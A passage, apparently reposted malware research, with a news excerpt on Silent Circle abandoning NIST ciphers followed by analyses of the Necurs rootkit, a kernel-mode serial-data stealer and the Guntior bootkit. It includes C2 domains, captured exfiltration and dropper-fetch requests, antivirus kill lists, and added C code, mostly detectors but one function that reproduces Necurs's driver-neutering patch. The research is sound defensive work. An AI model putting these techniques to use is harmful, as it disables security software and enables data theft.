“We are going to replace our use of the AES cipher with the Twofish cipher, as it is a drop-in replacement. We are going to replace our use of the SHA–2 hash functions with the Skein hash function. We are also examining using the Threefish cipher where that makes sense. (Full disclosure: I'm a co-author of Skein and Threefish.) Threefish is the heart of Skein, and is a tweakable, wide-block cipher. There are a lot of cool things you can do with it, but that requires some rethinking of protocols,” Callas said.

The decision by Silent Circle comes at a time when there are many unanswered questions about the NSA's influence on cryptographic algorithm development, specifically those standards developed by NIST. The National Institute of Standards and Technology is responsible for developing technical standards for the U.S. federal government and many of those standards are adopted by other organizations, specifically crypto standards. Recent revelations from the NSA leaks have shown that the NSA has some unspecified capabilities against certain crypto algorithms and also has been working to influence NIST standards development. In response to one of these revelations, NIST itself has advised people to stop using the Dual_EC_DRBG random number generator developed under its supervision.

“The DUAL_EC_DRBG discussion has been comic. The major discussion has been whether this was evil or merely stupid, and arguing the side of evil has even meant admitting it is technologically a stupid algorithm, which sends the discussion into an amusing spiral of meta-commentary,” Callas said.
Silent Circle's move away from AES and SHA-2 shouldn't be seen as an indictment of those two ciphers, Callas said, but more of an indication that there are better options out there without the shadow of potential NSA influence hanging over them.

“This doesn't mean we think that AES is insecure, or SHA–2 is insecure, or even that P–384 is insecure. It doesn't mean we think less of our friends at NIST, whom we have the utmost respect for; they are victims of the NSA's perfidy, along with the rest of the free world. For us, the spell is broken. We're just moving on. No kiss, no tears, no farewell souvenirs,” he said.

Source: https://threatpost.com/silent-circle-moving-away-from-nist-ciphers-in-wake-of-nsa-revelations/102452#.UkmXXBtaei8.twitter

These are just some ideas to take into consideration.
-
[h=1]Necurs rootkit under microscope[/h]

Okay, we already know about Necurs; this is just a reminder of its interesting features:

Highly difficult to remove from an infected system;
Targeted at blocking the drivers of around 30 AV products [and 130 drivers in total];
Also targets the x64 platform [has an x64 version of the driver];
The driver has obfuscated relocatable code;
Provides itself the earliest start in the system [before all AV or anti-malware drivers and system drivers];
Has its own PE loader with module relocation and IAT tuning, used to create a complete copy of the working driver;
Three types of blacklist: checking version info, special code signatures and driver names.

I already wrote about detection of this rootkit by various anti-rootkits here: Security/malware blog: Necurs rootkit detection. That post also lists the symptoms of infection and various kernel anomalies. Today we'll talk about Necurs in more detail.

https://twitter.com/artem_i_baranov/status/284941235934875648

First of all, the blacklist and how it is implemented. The list, which the rootkit examines, includes about 30 AV products (checked via version info) and 130 drivers (checked by comparing image names). The full list of vendors is available here - Necurs targeted to prevent work products of these firms: Agnitum Ltd ALWIL S - Pastebin.com, and the list of drivers here - Necurs targeted to prevent work the following drivers: kprocesshacker.sys Vb - Pastebin.com.

https://twitter.com/artem_i_baranov/status/284309401605648387
https://twitter.com/artem_i_baranov/status/284310691366727680

Before you start the static analysis you should retrieve the decrypted version of the driver. In its normal encrypted state it looks like this:

To be convinced that the rootkit is active, check for the presence of the NtSecureSys device object. The next step is to dump its decrypted body from memory with the help of an anti-rootkit or windbg. OK, let's do it with windbg.
Necurs sets some hooks in the SSDT, and this is one of the starting points for dumping its image from memory. Next we can dump it from memory. Instead of the !pool command you can search backwards for the MZ header to find the start of the decrypted copy:
    s 822bbe2b L-10000 'M' 'Z'
Decrypted driver: (screenshot)
The starting point of the blacklist checks is the LoadImageNotifyRoutine function. Detailed info about this feature: http://msdn.microsoft.com/en-us/library/windows/hardware/ff559957(v=vs.85).aspx. This callback is called every time a new driver [or user-mode image] is loaded into the system [or into a process]. This function contains all types of blacklist checks. For example, the screenshot below shows the check of vendor names in the version info. If the driver is blacklisted, Necurs patches its entry point with two instructions, so that DriverEntry returns STATUS_UNSUCCESSFUL and the I/O manager does not load the driver.
The rootkit also contains two special whitelists of drivers not included in the blacklist. The rootkit collects the whitelist information during its initialization: it scans the \drivers directory looking for drivers not included in the blacklist, and it also walks the services registry key and adds drivers to these lists. To avoid misunderstanding: it adds loaders to these lists. The ways in which driver entry points are modified look like this: (screenshot)
Necurs also blocks registry operations on its own service key, so any attempt to access the key fails. This is possible with the help of the registry callback described at http://msdn.microsoft.com/ru-ru/library/windows/hardware/ff545879(v=vs.85).aspx. The situation is similar with the file system: Necurs attaches its device object to the volume and tracks all file-system operations, so the rootkit body on the volume is inaccessible.
Another interesting feature of Necurs is the possibility to start before ALL drivers in the system [including boot bus extender drivers]. But on a clean system we see a different picture: (screenshot)
Ok, all right.
The conclusion is obvious: Necurs adds itself to the "Boot Bus Extender" group and modifies the priority ("Tag") of all drivers in this group (increases their Tag numbers by one, +1). For details about driver load priority, see CurrentControlSet\Services Subkey Entries.
Summary: Necurs also registers a callback for tracking handle-creation operations on processes with the help of ObRegisterCallbacks (API: http://msdn.microsoft.com/en-us/library/windows/hardware/ff558692(v=vs.85).aspx). From this callback the rootkit modifies the original desired access of the handle in special cases of handle opening. The mission of NtOpenProcessHook is to block handle-open operations on processes which the rootkit considers trusted.
According to the Microsoft Malware Protection Center (MMPC), Necurs has been found on more than 83,000 machines, and the Microsoft report calls the rootkit a "prevalent threat". This is not surprising; after the disclosure of the threat it becomes clear why. http://www.darkreading.com/risk-management/167901115/security/attacks-breaches/240144203/necurs-rootkit-spreading-quickly-microsoft-warns.html Unexpected reboot: Necurs - Microsoft Malware Protection Center - Site Home - TechNet Blogs
Fingerprints:
x32 version:
SHA256: 742a3c8c0a3601af29daffb966e947334d4f20501e5568b9c9fbf4c3526b4b84
SHA1: 30f63b8cae41a97456a82131c4577a2020697b89
MD5: 0907292986e05a8752bc1863556d229e
File size: 59776 bytes
x64 version:
SHA256: b3fea8183670ecf6150325f05aed28dfa27d7c6d2c1007808661f97c27fd7e1e
SHA1: d69b06801a8378e8c9ac8b369cb9e14ef8c8d479
MD5: 39b447e293979ac7259d4d9a2711c9a0
File size: 75720 bytes
posted by https://twitter.com/artem_i_baranov
Posted 29th December 2012 by Artem
Source: Security/malware blog: Necurs rootkit under microscope
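As an added example (not code from Artem's post and not the rootkit's own code), here is what the two-instruction entry-point patch described above amounts to, next to the check an analyst would run over a dumped driver image to spot it. The post does not show the bytes Necurs writes; the stub used here, mov eax, STATUS_UNSUCCESSFUL ; ret (B8 01 00 00 C0 C3), is an assumption, and the PE image is a minimal constructed one so the code runs anywhere a C compiler is available.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STATUS_UNSUCCESSFUL 0xC0000001u

/* PE/COFF layout constants */
#define DOS_MAGIC        0x5A4Du      /* "MZ" */
#define PE_SIGNATURE     0x00004550u  /* "PE\0\0" */
#define E_LFANEW         0x3C
#define FH_NUM_SECTIONS  2            /* IMAGE_FILE_HEADER.NumberOfSections */
#define FH_SIZE_OPT      16           /* IMAGE_FILE_HEADER.SizeOfOptionalHeader */
#define FH_SIZE          20
#define OPT_ENTRY        16           /* IMAGE_OPTIONAL_HEADER.AddressOfEntryPoint (PE32 and PE32+) */
#define SEC_SIZE         40
#define SEC_VSIZE        8
#define SEC_VADDR        12
#define SEC_RAWSIZE      16
#define SEC_RAWPTR       20

/* Assumed two-instruction stub: mov eax, STATUS_UNSUCCESSFUL ; ret */
static const uint8_t kNeuterStub[] = { 0xB8, 0x01, 0x00, 0x00, 0xC0, 0xC3 };

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Map AddressOfEntryPoint (an RVA) to a file offset through the section table.
 * Returns -1 if the buffer is not a sane PE or the RVA falls outside raw section data. */
long pe_entry_file_offset(const uint8_t *img, size_t len)
{
    if (len < 0x40 || rd16(img) != DOS_MAGIC) return -1;
    uint32_t nt = rd32(img + E_LFANEW);
    if (nt + 4 + FH_SIZE + OPT_ENTRY + 4 > len || rd32(img + nt) != PE_SIGNATURE) return -1;
    const uint8_t *fh = img + nt + 4;
    uint16_t nsec = rd16(fh + FH_NUM_SECTIONS);
    uint16_t optsz = rd16(fh + FH_SIZE_OPT);
    uint32_t entry = rd32(fh + FH_SIZE + OPT_ENTRY);
    const uint8_t *sec = fh + FH_SIZE + optsz;
    for (uint16_t i = 0; i < nsec; i++, sec += SEC_SIZE) {
        if ((size_t)(sec - img) + SEC_SIZE > len) return -1;
        uint32_t va = rd32(sec + SEC_VADDR), vsz = rd32(sec + SEC_VSIZE);
        uint32_t raw = rd32(sec + SEC_RAWPTR), rawsz = rd32(sec + SEC_RAWSIZE);
        if (entry >= va && entry < va + vsz) {
            uint32_t off = raw + (entry - va);
            if (entry - va >= rawsz || off + sizeof kNeuterStub > len) return -1;
            return (long)off;
        }
    }
    return -1;
}

/* What the rootkit does to a blacklisted driver: overwrite the start of
 * DriverEntry so the driver fails to load with STATUS_UNSUCCESSFUL. */
int neuter_driver_entry(uint8_t *img, size_t len)
{
    long off = pe_entry_file_offset(img, len);
    if (off < 0) return -1;
    memcpy(img + off, kNeuterStub, sizeof kNeuterStub);
    return 0;
}

/* Analyst side: does the entry point already start with that stub? */
int driver_entry_is_neutered(const uint8_t *img, size_t len)
{
    long off = pe_entry_file_offset(img, len);
    return off >= 0 && memcmp(img + off, kNeuterStub, sizeof kNeuterStub) == 0;
}

/* Constructed sample: minimal PE32 with one .text section whose entry point
 * begins with the usual MSVC prologue (mov edi,edi ; push ebp ; mov ebp,esp). */
size_t build_sample_driver(uint8_t *buf, size_t cap)
{
    static const uint8_t prologue[] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC };
    const size_t total = 0x400;
    if (cap < total) return 0;
    memset(buf, 0, total);
    wr16(buf, DOS_MAGIC);
    wr32(buf + E_LFANEW, 0x40);
    uint8_t *nt = buf + 0x40;
    wr32(nt, PE_SIGNATURE);
    uint8_t *fh = nt + 4;
    wr16(fh, 0x014C);                 /* IMAGE_FILE_MACHINE_I386 */
    wr16(fh + FH_NUM_SECTIONS, 1);
    wr16(fh + FH_SIZE_OPT, 0xE0);     /* PE32 optional header size */
    uint8_t *opt = fh + FH_SIZE;
    wr16(opt, 0x10B);                 /* PE32 magic */
    wr32(opt + OPT_ENTRY, 0x1000);
    uint8_t *sec = opt + 0xE0;
    memcpy(sec, ".text", 5);
    wr32(sec + SEC_VSIZE, 0x200);
    wr32(sec + SEC_VADDR, 0x1000);
    wr32(sec + SEC_RAWSIZE, 0x200);
    wr32(sec + SEC_RAWPTR, 0x200);
    memcpy(buf + 0x200, prologue, sizeof prologue);
    return total;
}

int main(void)
{
    uint8_t img[0x400];
    size_t n = build_sample_driver(img, sizeof img);
    printf("entry at file offset 0x%lx, neutered=%d\n", (unsigned long)pe_entry_file_offset(img, n),
           driver_entry_is_neutered(img, n));
    neuter_driver_entry(img, n);
    printf("after patch: neutered=%d\n", driver_entry_is_neutered(img, n));
    return 0;
}
```

To run the check over a real dump, read the file into img in place of build_sample_driver(); the RVA-to-offset walk is the same for a PE32+ driver, since AddressOfEntryPoint sits at the same offset in both optional header formats.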
-
[h=1]Investigation of an interesting kernel-mode stealer[/h]
About two weeks ago my friend R136a1 from the kernelmode forum came across a dropper that installs a driver in the system. We decided to research it, and starting the analysis was not a mistake...
Initial dropper hash:
SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74
MD5: 9c0744b8119df63371b83724bafe2095
File size: 32768 bytes
At the moment only one or two vendors identify it with a malware family. The main purpose of the dropper is to extract the driver from itself and install it in the system. The driver is disguised as a USB driver and is always extracted with the same name, usbhc.sys. Hash:
SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74
MD5: 9c0744b8119df63371b83724bafe2095
File size: 32768 bytes
One of the strangest things I discovered: the driver is fully standalone and does not receive commands from user mode. And of course it does not create a device object or a symbolic link for user-mode interaction. The research led me to the conclusion that the driver has one main purpose: stealing data from devices connected to the computer's serial ports and sending it to a remote server...
To steal data from these devices it performs preparatory operations. First, it reads the contents of \REGISTRY\MACHINE\HardWare\DeviceMap\SERIALCOMM, which stores the devices attached to serial ports [devices representing serial ports]. Second, it attaches to all these devices. After the rootkit has attached its device, the device stack of the serial port looks like this: (screenshot)
The second very interesting thing in this case is that all network communication with the remote server is also implemented in the driver:
- DGA (Domain Generation Algorithm)
- DNS over UDP (to convert domain names into IPs)
- HTTP communication over TCP
- Special communication with the ndisrd.sys driver.
To retrieve domains and resolve them to IP addresses, the driver uses the following technique.
First, it looks for the DhcpNameServer parameter of each interface it finds under \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\. Next, it generates domains and queries the DNS service for their status. All further communication is done through this server (which was obtained via DNS). All the domains it polls are listed at the end of the post.
Network communication is based entirely on TDI (Transport Device Interface) [see the WDK for its description, or this tutorial: Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject]. Preparing the server connection looks like this (in SDK terms, creating a socket): (screenshot) Next it connects to the remote server: (screenshot)
Internally in the driver, a socket is described by this structure:
    struct TDI_CONNECTION_INTERNAL {
        PFILE_OBJECT foTransportAddress;
        HANDLE hTransportAddress;
        PVOID foConnection;
        HANDLE hConnection;
        ....
    }
After the connection with the server is established, it can send HTTP requests to it. The requests look like this:
    GET /srv.php?&id=uniqueID&mark=METKA&special_marker_opt HTTP/1.1
    Accept-Language: en
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: host
    Connection: close
A simple exchange with the server (roll call) looks like this:
    -> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1
       Accept-Language: en
       User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
       Host: perwadav.org
       Connection: close
    <- HTTP/1.1 200 OK
       Date: Mon, 23 Jul 2012 17:13:16 GMT
       Server: Apache/2.2.3 (CentOS)
       X-Powered-By: PHP/5.1.6
       Content-Length: 20
       Connection: close
       Content-Type: text/html; charset=UTF-8
       SERVERISOK -> server status
After the connection is established, the driver downloads a dropper of ndisrd.sys from the server with the request:
    GET /srv.php?&id=uniqueID&mark=METKA&f=os_ver HTTP/1.1
The os_ver variable has the form n_xp_32 or n_7_32. Basic requests are formed with this function: (screenshot) Conversation: (screenshot)
The driver saves the dropper to \SystemRoot\System32\kb_random.exe. In my case:
\SystemRoot\System32\kbVOTHBNAU.exe
From the driver: (screenshot)
Downloaded dropper:
SHA1: 911c027e5f4acf4a75d0cf8e751d0ba8fbbd0959
MD5: a93b5454f4492a4a8d971811f2d12b1e
File size: 81805 bytes
After the dropper is downloaded, it is installed by the driver. Installation is performed in the context of a trusted process, explorer or services (depending on the OS version). The purpose of the downloaded dropper is installation of the ndisrd.sys driver. The rootkit driver opens the ndisrd device. The purpose of the IOCTLs that the rootkit sends to NDISRD could not be identified, but here is a list of them:
    830020D0
    830020D4
    830020D8
    830020DC
    830020C4
As I said before, the main purpose of the rootkit is stealing data from serial devices and sending it to the server. Data stealing is performed by registering a completion routine in the Write and Read IRP dispatch functions. The driver registers its device in the chain of serial devices and can see all requests that pass through the chain. The IRP_MJ_READ handler registers a completion routine and calls the next driver on the stack. The completion routine looks like this: (screenshot)
After data is captured, a special thread wakes up and writes the cached data to a file: \SystemRoot\System32\svlog.log. After the data is written, the thread sets a special event signalling that the data has been written to the file. The thread responsible for sending data from the file to the server:
    -> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1
       Accept-Language: en
       User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
       Host: perwadav.org
       Connection: close
       Data of file
    <- HTTP/1.1 200 OK
       Date: Mon, 23 Jul 2012 17:13:16 GMT
       Server: Apache/2.2.3 (CentOS)
       X-Powered-By: PHP/5.1.6
       Content-Length: 20
       Connection: close
       Content-Type: text/html; charset=UTF-8
       SERVERISOK -> server status
Information about the malicious domain: (screenshot) This guy's LinkedIn profile: Nikolay Petrachkov | LinkedIn.
You can download the paper about the dropper by R136a1 here: http://artemonsecurity.com/research_of_unk_malware.pdf
List of domains:
oqdxvvbk.com perwadav.org ebcgndvj.org qdrhandp.org tbkfopaf.org twmhimdj.org thgdabbj.com efjwirmb.org qxkomgei.com bbfsyfsr.com
jbpgfqra.org anwfejhx.com frstfnuh.org xbcfgule.com cyfohwwf.com catjdhuu.org woyhiepx.org fmegpykr.com bowgtptk.com dnrdyute.org
jchgbmmo.org poxldxhv.org mkrhwons.org aovinvsi.org ivogeuom.com mubrnyxd.org emhedcxc.org ibqanwif.org umspakwh.org wianbpdb.com
oejkewmq.org gqnjmmgd.org lpdbwrfu.com kwkdraat.org dfogsbau.org gjfxavjw.org idrlbacl.org xavostmi.org sxdhddbb.com wbqwvapj.org
jiqcsvng.com gkceusvc.com vssqfbmq.org pcawxcwp.com lpjnerpe.org safcoyho.com llbeoaix.com oirhxgpf.org ygdmlsgl.org fyxfattr.com
tdcqhkne.com wwdstess.org eexeufwo.org wbwfjosa.org ixskfbvp.org fmcspasm.org wdjjkmwv.com svpaidvo.org vnhcftma.org twjotfct.org
fwlckqdv.org bjfgwabb.com cdobjfic.org qjfhsiua.org enldxohy.com dcnpyqlg.org nsbjdfyq.org cyhwpiaw.org mnbpwbjj.org volgbbox.org
tgrwfjpv.com lgqxwrkf.org xwalgbjg.com yuwbhxeu.com hulosvof.org qxpvprdy.com ijjxoocp.org fbrebqna.com tpxirylu.com keukrpqf.org
rxyjkcwj.org oucmtrhv.com rxftpvku.com wlxrrqyd.org ybljdhos.org qwkpxcct.org qecgrdxg.org dudfymdl.org sesjvgii.com yxcxjriu.org
ljmiphjx.org btotkygq.org fodbotqn.org rfsojypy.com mbdoebhh.org johqyxsw.org gldfgkey.com fvpujviq.org fyclctjf.org xnvwdmyf.org
posted by https://twitter.com/artem_i_baranov
Posted 26th July 2012 by Artem
Source: Security/malware blog: Investigation an interesting kernel mode stealer
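An added example, not part of the original post: detection logic for the beacons captured above, written as a request classifier that can be run over proxy or IDS captures. It matches the fixed URL shape /srv.php?&id=<id>&mark=METKA with its three variants (roll call, dropper fetch with &f=, exfiltration with &a=) and, as an independent second signal, checks the Host header against a few of the domains listed in the post. The sample requests are constructed to mirror the captures above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum beacon_kind { BEACON_NONE = 0, BEACON_ROLLCALL, BEACON_DROPPER_FETCH, BEACON_EXFIL };

/* A few of the DGA domains listed in the post (the full list is above). */
static const char *const kKnownC2[] = {
    "perwadav.org", "oqdxvvbk.com", "ebcgndvj.org", "qdrhandp.org", "tbkfopaf.org",
};

/* s begins with prefix, ignoring case */
static int ci_prefix(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

/* Copy the value of header `name` out of a raw request; returns 0 if absent. */
static int get_header(const char *req, const char *name, char *out, size_t cap)
{
    size_t nlen = strlen(name);
    const char *p = req;
    while ((p = strstr(p, "\r\n")) != NULL) {
        p += 2;
        if (ci_prefix(p, name) && p[nlen] == ':') {
            p += nlen + 1;
            while (*p == ' ') p++;
            size_t n = strcspn(p, "\r\n");
            if (n >= cap) return 0;
            memcpy(out, p, n);
            out[n] = '\0';
            return 1;
        }
    }
    return 0;
}

/* Match the request line against the stealer's fixed URL shape:
 *   GET /srv.php?&id=<ID>&mark=METKA[&f=<os_ver> | &a=] HTTP/1.1
 * On a match the bot id is copied to id_out and the variant is returned. */
enum beacon_kind classify_request(const char *req, char *id_out, size_t id_cap)
{
    static const char prefix[] = "GET /srv.php?&id=";
    static const char mark[] = "&mark=METKA";
    if (strncmp(req, prefix, sizeof prefix - 1) != 0) return BEACON_NONE;
    const char *p = req + sizeof prefix - 1;
    size_t idlen = 0;
    while (isalnum((unsigned char)p[idlen])) idlen++;
    if (idlen == 0 || idlen >= id_cap) return BEACON_NONE;
    memcpy(id_out, p, idlen);
    id_out[idlen] = '\0';
    p += idlen;
    if (strncmp(p, mark, sizeof mark - 1) != 0) return BEACON_NONE;
    p += sizeof mark - 1;
    enum beacon_kind kind;
    if (strncmp(p, " HTTP/1.1", 9) == 0) kind = BEACON_ROLLCALL;
    else if (strncmp(p, "&f=", 3) == 0) { kind = BEACON_DROPPER_FETCH; p = strchr(p, ' '); }
    else if (strncmp(p, "&a=", 3) == 0) { kind = BEACON_EXFIL; p += 3; }
    else return BEACON_NONE;
    if (p == NULL || strncmp(p, " HTTP/1.1", 9) != 0) return BEACON_NONE;
    return kind;
}

/* Independent second signal: the Host header names one of the DGA domains. */
int host_is_known_c2(const char *req)
{
    char host[256];
    if (!get_header(req, "Host", host, sizeof host)) return 0;
    for (size_t i = 0; i < sizeof kKnownC2 / sizeof kKnownC2[0]; i++)
        if (strlen(host) == strlen(kKnownC2[i]) && ci_prefix(host, kKnownC2[i])) return 1;
    return 0;
}

/* Constructed sample traffic shaped like the captures in the post. */
static const char kRollcall[] =
    "GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1\r\n"
    "Accept-Language: en\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: perwadav.org\r\nConnection: close\r\n\r\n";
static const char kFetch[] =
    "GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&f=n_xp_32 HTTP/1.1\r\n"
    "Host: perwadav.org\r\nConnection: close\r\n\r\n";
static const char kExfil[] =
    "GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1\r\n"
    "Host: perwadav.org\r\nConnection: close\r\n\r\n<captured serial data>";
static const char kBenign[] =
    "GET /srv.php?id=1 HTTP/1.1\r\nHost: example.com\r\n\r\n";

int main(void)
{
    const char *samples[] = { kRollcall, kFetch, kExfil, kBenign };
    static const char *names[] = { "none", "rollcall", "dropper-fetch", "exfil" };
    for (size_t i = 0; i < 4; i++) {
        char id[32] = "";
        enum beacon_kind k = classify_request(samples[i], id, sizeof id);
        printf("sample %zu: %s id=%s known_c2=%d\n", i, names[k], id, host_is_known_c2(samples[i]));
    }
    return 0;
}
```

The URL match is deliberately strict (leading "?&", the literal METKA marker, the three known suffixes) so that ordinary srv.php traffic is not flagged; the Host check catches sessions where the path differs but the DGA domain is still in use.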
-
[h=1]Guntior - detailed analysis of the Chinese bootkit[/h]
The original dropper that contains the bootkit dropper:
SHA1: e83ca87a39a5f15ca5942fd57d78e790861c2937
MD5: 15e692cf34a70fb364591622bff1e43a
File size: 86027 bytes
This original dropper extracts the bootkit dropper from itself and launches it with the same name. Bootkit dropper:
SHA1: 5ecefefe4bbfc040927e827ab81c10caf5d10f90
MD5: f72e3d86b8f4f97d103ff1b7f87213f2
File size: 54272 bytes
The bootkit dropper stores its components in the resource section in encrypted form. The decryption routine looks like this: (screenshot)
The bootkit dropper has an interesting method of reaching the OEP: via a SEH handler, by generating an exception. The OEP looks like this (the dropper supports two modes of running, as a DLL and as an EXE): (screenshot)
Anti-debug/anti-emulation feature: (screenshot)
At the next stage it performs an interesting trick to load itself as a DLL and continue initialization as a DLL. First, it copies itself to the system directory as <random name>.tmp and patches the PE characteristics by setting the DLL flag. Second, it hooks imm32.dll!ImmLoadLayout and ntdll.dll!ZwQueryValueKey. The ZwQueryValueKey hook looks like this: (screenshot)
After the hooks are set it tries to initiate a keyboard layout switch (the layout was already registered by creating a new value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts). The malicious keyboard layout looks like this: (screenshot)
Finally it reverts the layout to the original.
Second-stage initialization via DLL loading. At this stage the DLL should be loaded into the working processes in the system, and the first thing it does is set a special event to signal the bootkit EXE dropper that it is running successfully. So, if the injection fails, it runs the next phase.
Before loading its driver, it performs some actions targeted at disabling some protections that may be present in the system:
- In the case of HintClient.exe, which belongs to the company Shanghai Hintsoft Co., Ltd. (http://www.hintsoft.com.cn/), it sends a special IOCTL code to its driver (see the code at 00403A3B).
- In the case of Drvmon (a driver monitoring tool) it also sends a special IOCTL to an unknown driver (see the code at 00403B0A).
Next it loads the driver and infects the MBR. Driver:
SHA1: adcdee632d7915f5e73669d809d9713e9250b81d
MD5: c1f5c5af49243e497ae979f2622ab5d0
File size: 4704 bytes
Features of the driver:
- Low-level disk I/O
- Process killing
It creates a device named \Device\Guntior to communicate with ring 3. Strings in the driver:
\Device\Guntior
\??\Guntior
RSDS C:\sys.pdb
memcpy MmMapLockedPagesSpecifyCache memset IoDeleteSymbolicLink RtlInitUnicodeString IoDeleteDevice RtlGetVersion IofCompleteRequest IoCreateSymbolicLink IoCreateDevice PsLookupProcessByProcessId MmIsAddressValid ObfDereferenceObject ObReferenceObjectByPointer ntoskrnl.exe WRITE_PORT_BUFFER_USHORT HalGetBusData READ_PORT_BUFFER_USHORT KfRaiseIrql KfLowerIrql
The driver is loaded via a very interesting trick: sending a special IOCTL to the PnP manager. Unlike other bootkits, which intercept functions of disk.sys or atapi.sys to hide the malicious MBR and the payload at the end of the disk, this bootkit intercepts nothing and supports unloading (it has an unload routine).
The original (not infected) MBR looks like this: (screenshot)
The malicious one (at offset 0x190 it stores the offset of its extension): (screenshot)
At the end of the disk the bootkit stores:
- The original MBR
- The extension of the malicious boot code
- The DLL
- The driver
The main payload is stored in the DLL [resource number 111]. The dropper extracts it from the resource, decrypts it and writes it to systemroot\system32\appmgmts.dll. It also completely overwrites systemroot\system32\sfc_os.dll with the DLL body. Internally the DLL is stored as a rewritten sfc_os.dll from a Chinese Windows XP.
The DLL is targeted at killing the following processes:
nod32krn.exe egui.exe ekrn.exe 360tray.exe 360leakfixer.exe 360Safe.exe safeboxTray.exe 360safebox.exe 360sd.exe ZhuDongFangYu.exe 360rp.exe 360sdupd.exe Calc.exe KSWebShield.exe kxesapp.exe kxeserv.exe kwstray.exe kxedefend.exe upsvc.exe kxescore.exe KVExpert.exe kxetray.exe KSafeSvc.exe KSafeTray.exe guiyingfix.exe RavMonD.exe RsTray.exe RsAgent.exe RegGuide.exe RsMain.exe RsCopy.exe Rav.exe KVSrvXP.exe KVExpert.exe KVMonXp.exe avp.exe avp.exe ras.exe knownsvr.exe rstray.exe knsdtray.exe knsd.exe knsdsvc.exe knsdsve.exe QQPCLeakScan.exe QQPCWebShield.exe QQPCTAVSrv.exe QQPCRTP.exe QQPCMgr.exe QQPCUpdateAVLib.exe QQPCTray.exe QQRepair.exe QQPCPatch.exe
Process-killing code: (screenshot)
HTTP request:
    HTTP/1.1
    Accept: */*
    Accept-Language: zh-cn
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: %s
    Connection: Keep-Alive
The dropper with decrypted payload is available for download here: KernelMode.info • View topic - Guntior bootkit (Chinese combine)
Dumps of the malicious code with some comments by Peter are here: KernelMode.info • View topic - Guntior bootkit (Chinese combine)
posted by https://twitter.com/artem_i_baranov
Posted 18th July 2012 by Artem
Source: Security/malware blog: Guntior - detailed analysis of the Chinese bootkit
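An added example, not from the original post and not Guntior's code: an MBR checker of the kind one would run when an infection like this is suspected. It parses the partition table, diffs the boot-code area of the live MBR against a trusted copy (Guntior itself keeps the original MBR at the end of the disk, so a trusted copy is available to the analyst), and reports the word at offset 0x190, where the post says the extension offset is kept. Both sectors here are constructed; the value planted at 0x190, its 16-bit width, and the untouched partition table are assumptions, and the loader-stub and hook bytes are placeholders rather than Guntior's boot code.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MBR_SIZE        512
#define MBR_CODE_END    0x1B8   /* boot code area ends where the disk signature (0x1B8) starts */
#define MBR_PART_TABLE  0x1BE
#define MBR_EXT_OFFSET  0x190   /* where, per the post, Guntior keeps the offset of its extension */

struct mbr_part { uint8_t status, type; uint32_t lba_start, sectors; };

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Parse the four primary partition entries. Returns the number of entries in
 * use, or -1 if the 0x55AA signature is missing or an entry is malformed. */
int mbr_parse(const uint8_t *mbr, struct mbr_part out[4])
{
    if (mbr[510] != 0x55 || mbr[511] != 0xAA) return -1;
    int used = 0, bootable = 0;
    for (int i = 0; i < 4; i++) {
        const uint8_t *e = mbr + MBR_PART_TABLE + 16 * i;
        out[i].status = e[0];
        out[i].type = e[4];
        out[i].lba_start = rd32(e + 8);
        out[i].sectors = rd32(e + 12);
        if (out[i].type == 0) continue;                       /* empty slot */
        if (e[0] != 0x00 && e[0] != 0x80) return -1;          /* status must be inactive or active */
        if (e[0] == 0x80 && ++bootable > 1) return -1;        /* at most one active partition */
        if (out[i].sectors == 0) return -1;
        used++;
    }
    return used;
}

/* Compare the boot-code area of the live MBR with a trusted copy. Returns the
 * number of differing bytes; *first receives the first differing offset. */
int mbr_code_diff(const uint8_t *live, const uint8_t *ref, size_t *first)
{
    int n = 0;
    *first = (size_t)-1;
    for (size_t i = 0; i < MBR_CODE_END; i++)
        if (live[i] != ref[i]) { if (*first == (size_t)-1) *first = i; n++; }
    return n;
}

/* Word at 0x190, read little-endian. The 16-bit width is an assumption. */
uint16_t mbr_ext_pointer(const uint8_t *mbr)
{
    return (uint16_t)(mbr[MBR_EXT_OFFSET] | (mbr[MBR_EXT_OFFSET + 1] << 8));
}

/* Constructed clean MBR: placeholder loader stub, zeroed code area, one active NTFS partition. */
void build_clean_mbr(uint8_t *mbr)
{
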